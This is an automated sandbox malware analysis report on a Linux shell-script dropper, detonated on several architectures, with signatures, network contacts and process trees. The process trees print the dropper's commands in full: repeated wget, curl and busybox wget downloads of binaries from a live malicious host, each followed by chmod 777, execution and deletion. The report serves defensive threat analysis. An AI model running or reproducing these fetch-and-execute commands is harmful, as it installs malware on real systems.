Malware Analysis Report

2025-05-06 04:16

Sample ID 241025-bjr25azhkl
Target 15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
SHA256 15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a
Tags
discovery antivm defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a

Threat Level: Shows suspicious behavior

The file 15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion

Executes dropped EXE

File and Directory Permissions Modification

Checks CPU configuration

Writes file to tmp directory

System Network Configuration Discovery

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-25 01:10

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-25 01:10

Reported

2024-10-25 01:13

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

148s

Max time network

129s

Command Line

[/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh

[/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 151.101.129.91:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.129.91:443 tcp
GB 89.187.167.38:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.9:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-25 01:10

Reported

2024-10-25 01:13

Platform

debian9-armhf-20240611-en

Max time kernel

148s

Max time network

14s

Command Line

[/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh

[/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-25 01:10

Reported

2024-10-25 01:13

Platform

debian9-mipsbe-20240611-en

Max time kernel

88s

Max time network

90s

Command Line

[/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf /tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf N/A
N/A /tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n /tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n N/A
N/A /tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR /tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR N/A
N/A /tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ /tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ N/A
N/A /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya N/A
N/A /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 N/A
N/A /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr N/A
N/A /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO N/A
N/A /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 N/A
N/A /tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y /tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y N/A
N/A /tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr /tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr N/A
N/A /tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g /tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g N/A
N/A /tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR /tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR N/A
N/A /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv N/A
N/A /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO N/A
N/A /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya N/A
N/A /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 N/A
N/A /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr N/A
N/A /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv N/A
N/A /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 N/A
N/A /tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y /tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y N/A
N/A /tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr /tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr N/A
N/A /tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g /tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g N/A
N/A /tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR /tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR N/A
N/A /tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR /tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR N/A
N/A /tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf /tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf N/A
N/A /tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n /tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n N/A
N/A /tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ /tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR /usr/bin/curl N/A
File opened for modification /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr /usr/bin/curl N/A
File opened for modification /tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g /usr/bin/curl N/A
File opened for modification /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya /usr/bin/curl N/A
File opened for modification /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 /usr/bin/curl N/A
File opened for modification /tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ /usr/bin/curl N/A
File opened for modification /tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR /usr/bin/curl N/A
File opened for modification /tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR /usr/bin/curl N/A
File opened for modification /tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n /usr/bin/curl N/A
File opened for modification /tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr /usr/bin/curl N/A
File opened for modification /tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ /usr/bin/curl N/A
File opened for modification /tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr /usr/bin/curl N/A
File opened for modification /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv /usr/bin/curl N/A
File opened for modification /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya /usr/bin/curl N/A
File opened for modification /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 /usr/bin/curl N/A
File opened for modification /tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n /usr/bin/curl N/A
File opened for modification /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 /usr/bin/curl N/A
File opened for modification /tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g /usr/bin/curl N/A
File opened for modification /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO /usr/bin/curl N/A
File opened for modification /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO /usr/bin/curl N/A
File opened for modification /tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR /usr/bin/curl N/A
File opened for modification /tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf /usr/bin/curl N/A
File opened for modification /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv /usr/bin/curl N/A
File opened for modification /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 /usr/bin/curl N/A
File opened for modification /tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf /usr/bin/curl N/A
File opened for modification /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr /usr/bin/curl N/A
File opened for modification /tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y /usr/bin/curl N/A
File opened for modification /tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y /usr/bin/curl N/A

Processes

/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh

[/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/bin/chmod

[chmod 777 V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf

[./V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/bin/rm

[rm V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/bin/chmod

[chmod 777 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n

[./4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/bin/rm

[rm 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR]

/bin/chmod

[chmod 777 JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR]

/tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR

[./JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR]

/bin/rm

[rm JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ]

/bin/chmod

[chmod 777 r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ]

/tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ

[./r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ]

/bin/rm

[rm r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya]

/bin/chmod

[chmod 777 KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya]

/tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya

[./KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya]

/bin/rm

[rm KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7]

/bin/chmod

[chmod 777 QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7]

/tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7

[./QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7]

/bin/rm

[rm QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr]

/bin/chmod

[chmod 777 J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr]

/tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr

[./J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr]

/bin/rm

[rm J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO]

/bin/chmod

[chmod 777 gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO]

/tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO

[./gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO]

/bin/rm

[rm gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74]

/bin/chmod

[chmod 777 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74]

/tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74

[./0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74]

/bin/rm

[rm 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y]

/bin/chmod

[chmod 777 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y]

/tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y

[./2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y]

/bin/rm

[rm 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr]

/bin/chmod

[chmod 777 PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr]

/tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr

[./PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr]

/bin/rm

[rm PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g]

/bin/chmod

[chmod 777 ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g]

/tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g

[./ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g]

/bin/rm

[rm ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR]

/bin/chmod

[chmod 777 Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR]

/tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR

[./Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR]

/bin/rm

[rm Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv]

/bin/chmod

[chmod 777 EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv]

/tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv

[./EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv]

/bin/rm

[rm EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO]

/bin/chmod

[chmod 777 gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO]

/tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO

[./gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO]

/bin/rm

[rm gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya]

/bin/chmod

[chmod 777 KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya]

/tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya

[./KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya]

/bin/rm

[rm KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7]

/bin/busybox

